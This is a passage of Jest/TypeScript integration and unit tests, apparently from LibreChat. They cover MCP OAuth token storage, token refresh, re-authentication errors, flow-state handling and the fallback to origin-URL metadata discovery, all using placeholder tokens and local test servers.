const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
expect(result).not.toBeNull();
expect(result!.access_token).not.toBe(initial.access_token);
// Verify the refreshed token works against the server
const mcpRes = await fetch(server.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Accept: 'application/json, text/event-stream',
Authorization: `Bearer ${result!.access_token}`,
},
body: JSON.stringify({
jsonrpc: '2.0',
method: 'initialize',
id: 1,
params: {
protocolVersion: '2025-03-26',
capabilities: {},
clientInfo: { name: 'test', version: '0.0.1' },
},
}),
});
expect(mcpRes.status).toBe(200);
});
});
describe('Access token expired + refresh token rejected by server', () => {
let tokenStore: InMemoryTokenStore;
beforeEach(() => {
tokenStore = new InMemoryTokenStore();
});
it('should return null when refresh token is rejected (invalid_grant)', async () => {
const server = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
});
try {
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token: string;
};
// Store expired access token directly
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: `enc:${initial.access_token}`,
expiresIn: -1,
});
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:test-srv:refresh',
token: `enc:${initial.refresh_token}`,
expiresIn: 86400,
});
// Simulate server revoking the refresh token
server.issuedRefreshTokens.clear();
const refreshCallback = async (refreshToken: string): Promise<MCPOAuthTokens> => {
const res = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=refresh_token&refresh_token=${refreshToken}`,
});
if (!res.ok) {
const body = (await res.json()) as { error: string };
throw new Error(`Token refresh failed: ${body.error}`);
}
const data = (await res.json()) as MCPOAuthTokens;
return data;
};
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
expect(result).toBeNull();
expect(logger.error).toHaveBeenCalledWith(
expect.stringContaining('Failed to refresh tokens'),
expect.any(Error),
);
} finally {
await server.close();
}
});
it('should return null when refresh endpoint returns unauthorized_client', async () => {
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: 'enc:expired-token',
expiresIn: -1,
});
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:test-srv:refresh',
token: 'enc:some-refresh-token',
expiresIn: 86400,
});
const refreshCallback = jest
.fn()
.mockRejectedValue(new Error('unauthorized_client: client not authorized for refresh'));
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
expect(result).toBeNull();
expect(logger.info).toHaveBeenCalledWith(
expect.stringContaining('does not support refresh tokens'),
);
});
});
describe('Access token expired + NO refresh token → ReauthenticationRequiredError', () => {
let tokenStore: InMemoryTokenStore;
beforeEach(() => {
tokenStore = new InMemoryTokenStore();
});
it('should throw ReauthenticationRequiredError when no refresh token stored', async () => {
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: 'enc:expired-token',
expiresIn: -1,
});
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
});
it('should throw ReauthenticationRequiredError with correct reason for expired token', async () => {
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: 'enc:expired-token',
expiresIn: -1,
});
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
}),
).rejects.toThrow('access token expired');
});
it('should throw ReauthenticationRequiredError with correct reason for missing token', async () => {
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
}),
).rejects.toThrow('access token missing');
});
});
describe('PENDING flow fallback for CSRF-less OAuth callbacks', () => {
it('should allow OAuth completion when PENDING flow exists (simulating chat/SSE path)', async () => {
const store = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(store as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-server',
userId: 'user1',
serverUrl: 'https://example.com',
state: 'test-state',
authorizationUrl: 'https://example.com/authorize?state=user1:test-server',
});
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(state?.status).toBe('PENDING');
const tokens: MCPOAuthTokens = {
access_token: 'new-access-token',
token_type: 'Bearer',
refresh_token: 'new-refresh-token',
obtained_at: Date.now(),
expires_at: Date.now() + 3600000,
};
const completed = await flowManager.completeFlow(flowId, 'mcp_oauth', tokens);
expect(completed).toBe(true);
const completedState = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(completedState?.status).toBe('COMPLETED');
expect((completedState?.result as MCPOAuthTokens | undefined)?.access_token).toBe(
'new-access-token',
);
});
it('should store authorizationUrl in flow metadata for re-issuance', async () => {
const store = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(store as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'user1:test-server';
const authUrl = 'https://auth.example.com/authorize?client_id=abc&state=user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-server',
userId: 'user1',
serverUrl: 'https://example.com',
state: 'test-state',
authorizationUrl: authUrl,
});
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect((state?.metadata as Record<string, unknown>)?.authorizationUrl).toBe(authUrl);
});
});
describe('Full token expiry → refresh failure → re-auth flow', () => {
let server: OAuthTestServer;
let tokenStore: InMemoryTokenStore;
beforeEach(async () => {
server = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
});
tokenStore = new InMemoryTokenStore();
});
afterEach(async () => {
await server.close();
});
it('should go through full cycle: get tokens → expire → refresh fails → re-auth needed', async () => {
// Step 1: Get initial tokens
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token: string;
};
// Step 2: Store tokens with valid expiry first
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'test-srv',
tokens: initial,
createToken: tokenStore.createToken,
});
// Step 3: Verify tokens work
const validResult = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
});
expect(validResult).not.toBeNull();
expect(validResult!.access_token).toBe(initial.access_token);
// Step 4: Simulate token expiry by directly updating the stored token's expiresAt
await tokenStore.updateToken({ userId: 'u1', identifier: 'mcp:test-srv' }, { expiresIn: -1 });
// Step 5: Revoke refresh token on server side (simulating server-side revocation)
server.issuedRefreshTokens.clear();
// Step 6: Try to get tokens — refresh should fail, return null
const refreshCallback = async (refreshToken: string): Promise<MCPOAuthTokens> => {
const res = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=refresh_token&refresh_token=${refreshToken}`,
});
if (!res.ok) {
const body = (await res.json()) as { error: string };
throw new Error(`Refresh failed: ${body.error}`);
}
const data = (await res.json()) as MCPOAuthTokens;
return data;
};
const expiredResult = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
// Refresh failed → returns null → triggers OAuth re-auth flow
expect(expiredResult).toBeNull();
// Step 7: Simulate the re-auth flow via FlowStateManager
const flowStore = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(flowStore as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'u1:test-srv';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-srv',
userId: 'u1',
serverUrl: server.url,
state: 'test-state',
authorizationUrl: `${server.url}authorize?state=${flowId}`,
});
// Step 8: Get a new auth code and exchange for tokens (simulating user re-auth)
const newCode = await server.getAuthCode();
const newTokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${newCode}`,
});
const newTokens = (await newTokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token?: string;
};
// Step 9: Complete the flow
const mcpTokens: MCPOAuthTokens = {
...newTokens,
obtained_at: Date.now(),
expires_at: Date.now() + newTokens.expires_in * 1000,
};
await flowManager.completeFlow(flowId, 'mcp_oauth', mcpTokens);
// Step 10: Store the new tokens
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'test-srv',
tokens: mcpTokens,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
findToken: tokenStore.findToken,
});
// Step 11: Verify new tokens work
const newResult = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
});
expect(newResult).not.toBeNull();
expect(newResult!.access_token).toBe(newTokens.access_token);
// Step 12: Verify new token works against server
const finalMcpRes = await fetch(server.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Accept: 'application/json, text/event-stream',
Authorization: `Bearer ${newResult!.access_token}`,
},
body: JSON.stringify({
jsonrpc: '2.0',
method: 'initialize',
id: 1,
params: {
protocolVersion: '2025-03-26',
capabilities: {},
clientInfo: { name: 'test', version: '0.0.1' },
},
}),
});
expect(finalMcpRes.status).toBe(200);
});
});
describe('Concurrent token expiry with connection mutex', () => {
it('should handle multiple concurrent getTokens calls when token is expired', async () => {
const tokenStore = new InMemoryTokenStore();
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: 'enc:expired-token',
expiresIn: -1,
});
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:test-srv:refresh',
token: 'enc:valid-refresh',
expiresIn: 86400,
});
let refreshCallCount = 0;
const refreshCallback = jest.fn().mockImplementation(async () => {
refreshCallCount++;
await new Promise((r) => setTimeout(r, 100));
return {
access_token: `refreshed-token-${refreshCallCount}`,
token_type: 'Bearer',
expires_in: 3600,
obtained_at: Date.now(),
expires_at: Date.now() + 3600000,
};
});
// Fire 3 concurrent getTokens calls via FlowStateManager (like the connection mutex does)
const flowStore = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(flowStore as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const getTokensViaFlow = () =>
flowManager.createFlowWithHandler('u1:test-srv', 'mcp_get_tokens', async () => {
return await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
});
const [r1, r2, r3] = await Promise.all([
getTokensViaFlow(),
getTokensViaFlow(),
getTokensViaFlow(),
]);
// All should get tokens (either directly or via flow coalescing)
expect(r1).not.toBeNull();
expect(r2).not.toBeNull();
expect(r3).not.toBeNull();
// The refresh callback should only be called once due to flow coalescing
expect(refreshCallback).toHaveBeenCalledTimes(1);
});
});
describe('Stale PENDING flow detection', () => {
it('should treat PENDING flows older than 2 minutes as stale', async () => {
const flowStore = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(flowStore as unknown as Keyv, {
ttl: 300000,
ci: true,
});
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-server',
authorizationUrl: 'https://example.com/auth',
});
// Manually age the flow to 3 minutes
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
if (state) {
state.createdAt = Date.now() - 3 * 60 * 1000;
await (flowStore as unknown as { set: (k: string, v: unknown) => Promise<void> }).set(
`mcp_oauth:${flowId}`,
state,
);
}
const agedState = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(agedState?.status).toBe('PENDING');
const age = agedState?.createdAt ? Date.now() - agedState.createdAt : 0;
expect(age).toBeGreaterThan(2 * 60 * 1000);
// A new flow should be created (the stale one would be deleted + recreated)
// This verifies our staleness check threshold
expect(age > PENDING_STALE_MS).toBe(true);
});
it('should not treat recent PENDING flows as stale', async () => {
const flowStore = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(flowStore as unknown as Keyv, {
ttl: 300000,
ci: true,
});
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-server',
authorizationUrl: 'https://example.com/auth',
});
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
const age = state?.createdAt ? Date.now() - state.createdAt : Infinity;
expect(age < PENDING_STALE_MS).toBe(true);
});
});
});

View file

@ -0,0 +1,544 @@
/**
* Integration tests for MCPTokenStorage.storeTokens() and MCPTokenStorage.getTokens().
*
* Uses InMemoryTokenStore to exercise encrypt/decrypt round-trips, expiry calculation,
* refresh callback wiring, and ReauthenticationRequiredError paths.
*/
import { MCPTokenStorage, ReauthenticationRequiredError } from '~/mcp/oauth';
import { InMemoryTokenStore } from './helpers/oauthTestServer';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
describe('MCPTokenStorage', () => {
let store: InMemoryTokenStore;
beforeEach(() => {
store = new InMemoryTokenStore();
jest.clearAllMocks();
});
describe('storeTokens', () => {
it('should create new access token with expires_in', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer', expires_in: 3600 },
createToken: store.createToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
expect(saved).not.toBeNull();
expect(saved!.token).toBe('enc:at1');
const expiresInMs = saved!.expiresAt.getTime() - Date.now();
expect(expiresInMs).toBeGreaterThan(3500 * 1000);
expect(expiresInMs).toBeLessThanOrEqual(3600 * 1000);
});
it('should create new access token with expires_at (MCPOAuthTokens format)', async () => {
const expiresAt = Date.now() + 7200 * 1000;
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: {
access_token: 'at1',
token_type: 'Bearer',
expires_at: expiresAt,
obtained_at: Date.now(),
},
createToken: store.createToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
expect(saved).not.toBeNull();
const diff = Math.abs(saved!.expiresAt.getTime() - expiresAt);
expect(diff).toBeLessThan(2000);
});
it('should default to 1-year expiry when none provided', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer' },
createToken: store.createToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
const oneYearMs = 365 * 24 * 60 * 60 * 1000;
const expiresInMs = saved!.expiresAt.getTime() - Date.now();
expect(expiresInMs).toBeGreaterThan(oneYearMs - 5000);
});
it('should update existing access token', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:old-token',
expiresIn: 3600,
});
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'new-token', token_type: 'Bearer', expires_in: 7200 },
createToken: store.createToken,
updateToken: store.updateToken,
findToken: store.findToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
expect(saved!.token).toBe('enc:new-token');
});
it('should store refresh token alongside access token', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: {
access_token: 'at1',
token_type: 'Bearer',
expires_in: 3600,
refresh_token: 'rt1',
},
createToken: store.createToken,
});
const refreshSaved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
});
expect(refreshSaved).not.toBeNull();
expect(refreshSaved!.token).toBe('enc:rt1');
});
it('should skip refresh token when not in response', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer', expires_in: 3600 },
createToken: store.createToken,
});
const refreshSaved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
});
expect(refreshSaved).toBeNull();
});
it('should store client info when provided', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer', expires_in: 3600 },
createToken: store.createToken,
clientInfo: { client_id: 'cid', client_secret: 'csec', redirect_uris: [] },
});
const clientSaved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth_client',
identifier: 'mcp:srv1:client',
});
expect(clientSaved).not.toBeNull();
expect(clientSaved!.token).toContain('enc:');
expect(clientSaved!.token).toContain('cid');
});
it('should use existingTokens to skip DB lookups', async () => {
const findSpy = jest.fn();
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer', expires_in: 3600 },
createToken: store.createToken,
updateToken: store.updateToken,
findToken: findSpy,
existingTokens: {
accessToken: null,
refreshToken: null,
clientInfoToken: null,
},
});
expect(findSpy).not.toHaveBeenCalled();
});
it('should handle invalid NaN expiry date', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: {
access_token: 'at1',
token_type: 'Bearer',
expires_at: NaN,
obtained_at: Date.now(),
},
createToken: store.createToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
expect(saved).not.toBeNull();
const oneYearMs = 365 * 24 * 60 * 60 * 1000;
const expiresInMs = saved!.expiresAt.getTime() - Date.now();
expect(expiresInMs).toBeGreaterThan(oneYearMs - 5000);
});
});
describe('getTokens', () => {
it('should return valid non-expired tokens', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:valid-token',
expiresIn: 3600,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result).not.toBeNull();
expect(result!.access_token).toBe('valid-token');
expect(result!.token_type).toBe('Bearer');
});
it('should return tokens with refresh token when available', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:at',
expiresIn: 3600,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result!.refresh_token).toBe('rt');
});
it('should return tokens without refresh token field when none stored', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:at',
expiresIn: 3600,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result!.refresh_token).toBeUndefined();
});
it('should throw ReauthenticationRequiredError when expired and no refresh', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
});
it('should throw ReauthenticationRequiredError when missing and no refresh', async () => {
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
});
it('should refresh expired access token when refresh token and callback are available', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const refreshTokens = jest.fn().mockResolvedValue({
access_token: 'refreshed-at',
token_type: 'Bearer',
expires_in: 3600,
obtained_at: Date.now(),
expires_at: Date.now() + 3600000,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
createToken: store.createToken,
updateToken: store.updateToken,
refreshTokens,
});
expect(result).not.toBeNull();
expect(result!.access_token).toBe('refreshed-at');
expect(refreshTokens).toHaveBeenCalledWith(
'rt',
expect.objectContaining({ userId: 'u1', serverName: 'srv1' }),
);
});
it('should return null when refresh fails', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const refreshTokens = jest.fn().mockRejectedValue(new Error('refresh failed'));
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
createToken: store.createToken,
updateToken: store.updateToken,
refreshTokens,
});
expect(result).toBeNull();
});
it('should return null when no refreshTokens callback provided', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result).toBeNull();
});
it('should return null when no createToken callback provided', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
refreshTokens: jest.fn(),
});
expect(result).toBeNull();
});
it('should pass client info to refreshTokens metadata', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_client',
identifier: 'mcp:srv1:client',
token: 'enc:{"client_id":"cid","client_secret":"csec"}',
expiresIn: 86400,
});
const refreshTokens = jest.fn().mockResolvedValue({
access_token: 'new-at',
token_type: 'Bearer',
expires_in: 3600,
});
await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
createToken: store.createToken,
updateToken: store.updateToken,
refreshTokens,
});
expect(refreshTokens).toHaveBeenCalledWith(
'rt',
expect.objectContaining({
clientInfo: expect.objectContaining({ client_id: 'cid' }),
}),
);
});
it('should handle unauthorized_client refresh error', async () => {
const { logger } = await import('@librechat/data-schemas');
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const refreshTokens = jest.fn().mockRejectedValue(new Error('unauthorized_client'));
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
createToken: store.createToken,
refreshTokens,
});
expect(result).toBeNull();
expect(logger.info).toHaveBeenCalledWith(
expect.stringContaining('does not support refresh tokens'),
);
});
});
describe('storeTokens + getTokens round-trip', () => {
it('should store and retrieve tokens with full encrypt/decrypt cycle', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: {
access_token: 'my-access-token',
token_type: 'Bearer',
expires_in: 3600,
refresh_token: 'my-refresh-token',
},
createToken: store.createToken,
clientInfo: { client_id: 'cid', client_secret: 'sec', redirect_uris: [] },
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result!.access_token).toBe('my-access-token');
expect(result!.refresh_token).toBe('my-refresh-token');
expect(result!.token_type).toBe('Bearer');
expect(result!.obtained_at).toBeDefined();
expect(result!.expires_at).toBeDefined();
});
});
});

View file

@ -1439,5 +1439,292 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => {
}), }),
); );
}); });
describe('path-based URL origin fallback', () => {
it('retries with origin URL when path-based discovery fails (stored clientInfo path)', async () => {
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
grant_types: ['authorization_code', 'refresh_token'],
},
};
const originMetadata = {
issuer: 'https://mcp.sentry.dev/',
authorization_endpoint: 'https://mcp.sentry.dev/oauth/authorize',
token_endpoint: 'https://mcp.sentry.dev/oauth/token',
token_endpoint_auth_methods_supported: ['client_secret_post'],
response_types_supported: ['code'],
jwks_uri: 'https://mcp.sentry.dev/.well-known/jwks.json',
subject_types_supported: ['public'],
id_token_signing_alg_values_supported: ['RS256'],
} as AuthorizationServerMetadata;
// First call (path-based URL) fails, second call (origin URL) succeeds
mockDiscoverAuthorizationServerMetadata
.mockResolvedValueOnce(undefined)
.mockResolvedValueOnce(originMetadata);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({
access_token: 'new-access-token',
refresh_token: 'new-refresh-token',
expires_in: 3600,
}),
} as Response);
const result = await MCPOAuthHandler.refreshOAuthTokens(
'test-refresh-token',
metadata,
{},
{},
);
// Discovery attempted twice: once with path URL, once with origin URL
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenNthCalledWith(
1,
expect.any(URL),
expect.any(Object),
);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenNthCalledWith(
2,
expect.any(URL),
expect.any(Object),
);
const firstDiscoveryUrl = mockDiscoverAuthorizationServerMetadata.mock.calls[0][0] as URL;
const secondDiscoveryUrl = mockDiscoverAuthorizationServerMetadata.mock.calls[1][0] as URL;
expect(firstDiscoveryUrl.href).toBe('https://mcp.sentry.dev/mcp');
expect(secondDiscoveryUrl.href).toBe('https://mcp.sentry.dev/');
// Token endpoint from origin discovery metadata is used (string in stored-clientInfo branch)
expect(mockFetch).toHaveBeenCalled();
const [fetchUrl, fetchOptions] = mockFetch.mock.calls[0];
expect(typeof fetchUrl).toBe('string');
expect(fetchUrl).toBe('https://mcp.sentry.dev/oauth/token');
expect(fetchOptions).toEqual(expect.objectContaining({ method: 'POST' }));
expect(result.access_token).toBe('new-access-token');
});
it('retries with origin URL when path-based discovery fails (no stored clientInfo)', async () => {
// No clientInfo — uses the auto-discovered branch
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
};
const originMetadata = {
issuer: 'https://mcp.sentry.dev/',
authorization_endpoint: 'https://mcp.sentry.dev/oauth/authorize',
token_endpoint: 'https://mcp.sentry.dev/oauth/token',
response_types_supported: ['code'],
jwks_uri: 'https://mcp.sentry.dev/.well-known/jwks.json',
subject_types_supported: ['public'],
id_token_signing_alg_values_supported: ['RS256'],
} as AuthorizationServerMetadata;
// First call (path-based URL) fails, second call (origin URL) succeeds
mockDiscoverAuthorizationServerMetadata
.mockResolvedValueOnce(undefined)
.mockResolvedValueOnce(originMetadata);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({
access_token: 'new-access-token',
refresh_token: 'new-refresh-token',
expires_in: 3600,
}),
} as Response);
const result = await MCPOAuthHandler.refreshOAuthTokens(
'test-refresh-token',
metadata,
{},
{},
);
// Discovery attempted twice: once with path URL, once with origin URL
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenNthCalledWith(
1,
expect.any(URL),
expect.any(Object),
);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenNthCalledWith(
2,
expect.any(URL),
expect.any(Object),
);
const firstDiscoveryUrl = mockDiscoverAuthorizationServerMetadata.mock.calls[0][0] as URL;
const secondDiscoveryUrl = mockDiscoverAuthorizationServerMetadata.mock.calls[1][0] as URL;
expect(firstDiscoveryUrl.href).toBe('https://mcp.sentry.dev/mcp');
expect(secondDiscoveryUrl.href).toBe('https://mcp.sentry.dev/');
// Token endpoint from origin discovery metadata is used (URL object in auto-discovered branch)
expect(mockFetch).toHaveBeenCalled();
const [fetchUrl, fetchOptions] = mockFetch.mock.calls[0];
expect(fetchUrl).toBeInstanceOf(URL);
